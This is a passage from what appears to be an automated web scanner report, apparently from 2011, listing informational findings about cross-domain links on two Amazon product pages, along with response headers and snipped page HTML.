...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.550. http://www.amazon.com/dp/B001AIM6V2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/dp/B001AIM6V2

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/dp/B001AIM6V2?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B001AIM6V2&adid=1E43GGA9XAJKCAEXAPNZ&

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SL500_AA300_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/videoreview._V192249916_.jpg
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/gridCSS/US-combined-1136328220.css._V175075348_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:20 GMT
Server: Server
x-amz-id-1: 0JE81R4J15T5AK071TZV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 4o8GRyUKmn3DkY5PnyV64O2bpKKjAgNwr+I4JvwWlUHgakGrnSAutbBsj2pwvLzy
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-9936733-9404845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=gpJo3CBiqTqDVIjaNvl4zvNYaep1x/cFw36XGdvu+t3AZoNYj5i0ue/20d7C2ZC+I33rSpZQv0bL0wk1Ew8YoO+rtNcIBPKLYOhOlxvFtzRIdn3kvGu6M4tMOkmBEeryBbTVlsJzSNcfMpAFM/xng7ZCP9yYT0m2OdKey3rxmCeD+Fl0AmJvQvFSHWkk425/o8Da9DpaI74WLGaJ7uNOvo6JLwZb5sYP9TvVnm5hmJQsWKXZoF2OyiWVivGgzTAUd6pRUIbYAZkt1sGVL+jil+zZfxZVnjBewrBhOy9v7AhUD8T6SoAGbb4KE5ZJBYWH2OXsSjuLHVIc52YxHzs6raEMD1dV4RY1XTDpsD0MSkGHFH6QBIcq1zDxTwlTMAha08n0zKNwM+cU9SxT/rymeyJe0yjBe5km9qvYTfgoBDkuOc+G0APo8cpXuSfIyagOnBt68PFK8so=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:21 2011 GMT
Content-Length: 243877

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SL500_AA300_.jpg" style="display:none;"/>
</div>
...[SNIP]...
ges/B001AIM6V2/ref=dp_image_0?ie=UTF8&n=283155&s=books" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SL500_AA300_.jpg" id="prodImage" width="300" height="300" border="0" alt="Cowboys & Indians The Premier Magazine of the West, Annual Holiday Gift Guide December 2007, Vol. 15, No. 8, Sam Elliott" onmouseover="" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/videoreview._V192249916_.jpg" width="109" alt="Video reviews" height="94" border="0" />
</td>
...[SNIP]...
</div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<script type="text/javascript">
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/183-9936733-9404845"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.551. http://www.amazon.com/dp/B0037UT1LY previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/dp/B0037UT1LY

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/dp/B0037UT1LY?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B0037UT1LY&adid=1E43GGA9XAJKCAEXAPNZ&

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/31eKwdL+IgL._AA60_.jpg
http://ecx.images-amazon.com/images/I/31hMpHoc2DL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41+pLzpausL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/410818FOEqL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/411F19H8x1L._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/413IWNaJz3L._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41CPFZJ47lL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_AA300_.jpg
http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_SS75_.jpg
http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_SY90_.jpg
http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL75_AA30_.jpg
http://ecx.images-amazon.com/images/I/41G5UMbKBhL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41HxXrCGmlL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41f1rr4L+ML._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41o+t3fNSCL._AA60_.jpg
http://ecx.images-amazon.com/images/I/41xM31QiwdL._AA60_.jpg
http://ecx.images-amazon.com/images/I/51+pSBoabkL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/510N7COnWtL._SL75_AA30_.jpg
http://ecx.images-amazon.com/images/I/510rZwhP+nL._SL75_AA30_.jpg
http://ecx.images-amazon.com/images/I/51BB1EyyLtL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51NP8V7GvbL._AA60_.jpg
http://ecx.images-amazon.com/images/I/51QgCA4XxTL._AA60_.jpg
http://ecx.images-amazon.com/images/I/51TWHoafZSL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51WHCULPM4L._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51jjsj2wFxL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51oxVpLW5YL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51tdfS+868L._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51w2-pY+9AL._AA60_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/img10/x-site/winter-post-holiday/75/winter-savings_75._V205521826_.gif
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/community-teasers/barbie._V192250991_.jpg
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/community-teasers/doll._V192251098_.jpg
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/default_teaser._V192250129_.jpg
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AHXqlZHU3.7qp5hfMEdPj9rlfXJFavr1hNHNmk7fH5cikHOvZClbY.mrVpbGwM3lO9-XgafQQ6egJUSF48Nrl0B2x2vrG56YUlHWc.OYP8OdoamNrWr3OXhVbO.bVVBJ2J8MPfDKbHAkNn1DM.Uc4CEU0P2PL1uraPJhOJ4M1b5b5FBx8siS2PENAiQs3VmBwRSSf5s8wQaJpywUnTJKT7XiNu-IV0sB-vEK4DSygG7XMt2PZIhuQMEMSU62othtqa1vCm8-Se-ivcB4tYAAPrIiFRasZpoBvzafAqDJqf4fVvftGehF7ekssxceMDBggeJ5S-Gv5G5wua7xNPfRLtDvSRC2F9jm.7ymWto99.M330.DDoe75M8ZHASAbT3wLxnIGjEITuPmVq0tRlfYzSQFWXOhFjyUYrPGSSghKi2FTHRTB97lSjA5kmzhvsXqvaUUSxmolehtE02ikcoLSlaEJ9uw0iTH3w5SD6pihbg2I7IsJHQTCs3P2eqQ9OsreskfL.mSGe0SSE20DFKiw0g_&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AJAS0r-Pb7PXpRVHTTdwALLVghbOoNBw.TF72Ig5FIC0HFlut61mHtvJjSkGsuImGdmSQn-cZ2sB7bMojeaD4QY0Mk8OR5PtpvvXfAdx0Y5AZx0KppK9OStSJRbTTa6Z3g9qTvjpzsiXrjayxgGwte0Eke6KnYKUEdMYotSAn5rEz-1YG3pAz8N.eUfozaSXt-7jlpBi6AbKqWElsCI4YROFPzDP.xbYJGxzj15KkaKahDTc0AON1HzrfQgm4fyiWwVE6MewhasjvBuA6O.i3cqXaeLSqRqnmRiw-1.1V79FMjAqz6474Uq3S5eF2evMuz4MoPAuCbACbiWN.MZ8C-LK63j9sJprj9St1C35.FXKqETsj1oeiG8ECoBqnSBkUWpEHs.vYyhRheFBFff9sYR-x303et1g10QTwnVwqoesYryspyuyWj625JmInfyGnX7LMwATP73mHqupPy0Qu3IqSrc4zQd7-1xJ7ZaPPCK5hXwFwssqmTjpsmHuHedeHVkUh87ofig20cv8EMeoVqjXKJc0AgPMbBsZq-QW-Cwvs6JR8RyYpkhMSCVixv7XzcLGgKMYGBDAwFfVs1QtXevPiI5bf2tseTEpw2KQoTlTHdUci0tQUe-vB-k5cVv3TCclFqra-nfXIHJT371v5tAMmzPWm7DzwZST8eKQtaj5&awt=1&s=
http://rd.a9.com/srv/redirect/?info=ALGVSGm7UFdxuWu68HoORrLIuqmXs0YMpRyYcw8fsjjSaj2qaDPp-aInn1GmA8.a0JJgATPsIckf5mZIL-zLYhbHvGN9KflWbA-mlmvpHo36zn.FHToVxPVThK9wT8PYdCPAdjuremYH2doh3.NeZrVSOYchWObIZCmtSJyQKY8mtrkL7tvukdR0ZuuvWcwQ5J2NmoSskL7FfZUAIere3na68e1m3ughtZzxGeECLIfSxMEeWACCmqoeyTZ6pmaW7GK3MQpA0QIlh-6pQetLEQHafOZeaaO7wIYyGURXFW45ga43PCvc4uP6.NB3Y2E3c-RwyE7kG3uPkcbx5m3A5lvBJ5pALAOOKm.sh1fhodkmi8npP4rNCPgCBOXsHmuXK2li0ecM5P7Rq9tSXivDuwQgkMWTZOtvSEAGgK2HU53NrX9Yx.Jk1q0u-Xj6nUdphp3LUNdm6iXpgGLxROmiS04BSHUU4IPUl5y2Gxetj0YN99GFQlGQoACFCwWJSz3CE1fAZh.M19ZOt8CWhcYXagmWzS4oiNlEiDYOKCuoC3Y5W0JJn-jWAjA3193LxGGaqb2HPLat1GQaBY3yMzwwhL41X8w.qrXS1jBOI2ZbJfXR79LcmhWjQssNYVNVFD.zATLOcU2pBY-Oa3WDQnx8mEo3QrWXnuoUmenb8XIbOs2c2L1iQhF5vjcqGVNsyTyFfAcZc8kIUS0DvzwWe7xG5vv8nGNmlRRsOg__&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:34 GMT
Server: Server
x-amz-id-1: 17DR8YMYSFMRZS8CDJ3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: VnWywM5oGusSEKwA0oEmF9YQZW0sC+3d/bn1D6tOPMIwmjnxiuAhufUUuKPMm5+U
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3953038-0825847; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=bK6rGx+CGyD+cP8GmimTlX4yOKqJEvwu6UnJY2SjL1UcG5vQjcyPPRSMkmQN8sbphtWyqe3kQNCI8rylaXXfj7BtPqZ81YiplXuRUKMy3Z/2mvrL0RV2OkiG88oBA7HbQe9Kd7fvezmpNGVnUs/WKVjx/v0XDHsIO3F31lrklY6f9VkJODasmR+vrmz5jfMxq2bRIKLa3TnEq25JcifPmFz90PVXykz/U8VHJ0uNE7A+Lbt2L2Z/SjjIzqMfkvaEaJ5CGm8K5P8lXwVh0vUHjthXVRSI9Cep53mqSnG9l0pUNqqdm4ZhxMz2Fnam7evwK9iiJKrdcr/H6916sNYxoaW3SE1y+GzhrAbM2j5TccGcCjdm1TEIUPGgRv1ET/0d7xHLJPqSIn5j3GRpNMwhQIwtYGX6XK/au2mTa3txsuMyDFNmteb/ybxsSFJKnNmQPriNDYGWivE=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:34 2011 GMT
Content-Length: 440777

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_AA300_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL75_AA30_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/510rZwhP%2BnL._SL75_AA30_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/510N7COnWtL._SL75_AA30_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td id="prodImageCell" height="300" width="300" style="padding-bottom: 10px;"><img onclick="if(1 ){ async_openImmersiveView(event);} else {openImmersiveView(event);}" class="prod_image_selector" style="cursor:pointer;" onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_AA300_.jpg" id="prodImage"/></td>
...[SNIP]...
</td>
<img id="loadingImage" src=http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif style="position: absolute; z-index: 200; display:none">
</tr>
...[SNIP]...
<td class="tiny"><img style="cursor:pointer;" onclick="if( 1 ) { async_openImmersiveView(event);} else {openImmersiveView(event); }" src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL75_AA30_.jpg" width="30" height="30" border="0" /></td>
...[SNIP]...
<td class="tiny"><img style="cursor:pointer;" onclick="if( 1 ) { async_openImmersiveView(event);} else {openImmersiveView(event); }" src="http://ecx.images-amazon.com/images/I/510rZwhP%2BnL._SL75_AA30_.jpg" width="30" height="30" border="0" /></td>
...[SNIP]...
<td class="tiny"><img style="cursor:pointer;" onclick="if( 1 ) { async_openImmersiveView(event);} else {openImmersiveView(event); }" src="http://ecx.images-amazon.com/images/I/510N7COnWtL._SL75_AA30_.jpg" width="30" height="30" border="0" /></td>
...[SNIP]...
<em>FBA items qualify for FREE Super Saver Shipping and <img src="http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif" width="92" alt="Amazon Prime" height="12" border="0" />.</em>
...[SNIP]...
ef="/Toys-Savings-Event/b/ref=amb_link_355070242_1?ie=UTF8&node=668401011&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=hero-quick-promo&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=1286310622&pf_rd_i=B0037UT1LY"><img src="http://g-ecx.images-amazon.com/images/G/01/img10/x-site/winter-post-holiday/75/winter-savings_75._V205521826_.gif" align="left" alt="Save on Toys and Games" border="0" /></a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAS0r-Pb7PXpRVHTTdwALLVghbOoNBw.TF72Ig5FIC0HFlut61mHtvJjSkGsuImGdmSQn-cZ2sB7bMojeaD4QY0Mk8OR5PtpvvXfAdx0Y5AZx0KppK9OStSJRbTTa6Z3g9qTvjpzsiXrjayxgGwte0Eke6KnYKUEdMYotSAn5rEz-1YG3pAz8N.eUfozaSXt-7jlpBi6AbKqWElsCI4YROFPzDP.xbYJGxzj15KkaKahDTc0AON1HzrfQgm4fyiWwVE6MewhasjvBuA6O.i3cqXaeLSqRqnmRiw-1.1V79FMjAqz6474Uq3S5eF2evMuz4MoPAuCbACbiWN.MZ8C-LK63j9sJprj9St1C35.FXKqETsj1oeiG8ECoBqnSBkUWpEHs.vYyhRheFBFff9sYR-x303et1g10QTwnVwqoesYryspyuyWj625JmInfyGnX7LMwATP73mHqupPy0Qu3IqSrc4zQd7-1xJ7ZaPPCK5hXwFwssqmTjpsmHuHedeHVkUh87ofig20cv8EMeoVqjXKJc0AgPMbBsZq-QW-Cwvs6JR8RyYpkhMSCVixv7XzcLGgKMYGBDAwFfVs1QtXevPiI5bf2tseTEpw2KQoTlTHdUci0tQUe-vB-k5cVv3TCclFqra-nfXIHJT371v5tAMmzPWm7DzwZST8eKQtaj5&awt=1&s=" rel="nofollow">2011 <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAS0r-Pb7PXpRVHTTdwALLVghbOoNBw.TF72Ig5FIC0HFlut61mHtvJjSkGsuImGdmSQn-cZ2sB7bMojeaD4QY0Mk8OR5PtpvvXfAdx0Y5AZx0KppK9OStSJRbTTa6Z3g9qTvjpzsiXrjayxgGwte0Eke6KnYKUEdMYotSAn5rEz-1YG3pAz8N.eUfozaSXt-7jlpBi6AbKqWElsCI4YROFPzDP.xbYJGxzj15KkaKahDTc0AON1HzrfQgm4fyiWwVE6MewhasjvBuA6O.i3cqXaeLSqRqnmRiw-1.1V79FMjAqz6474Uq3S5eF2evMuz4MoPAuCbACbiWN.MZ8C-LK63j9sJprj9St1C35.FXKqETsj1oeiG8ECoBqnSBkUWpEHs.vYyhRheFBFff9sYR-x303et1g10QTwnVwqoesYryspyuyWj625JmInfyGnX7LMwATP73mHqupPy0Qu3IqSrc4zQd7-1xJ7ZaPPCK5hXwFwssqmTjpsmHuHedeHVkUh87ofig20cv8EMeoVqjXKJc0AgPMbBsZq-QW-Cwvs6JR8RyYpkhMSCVixv7XzcLGgKMYGBDAwFfVs1QtXevPiI5bf2tseTEpw2KQoTlTHdUci0tQUe-vB-k5cVv3TCclFqra-nfXIHJT371v5tAMmzPWm7DzwZST8eKQtaj5&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
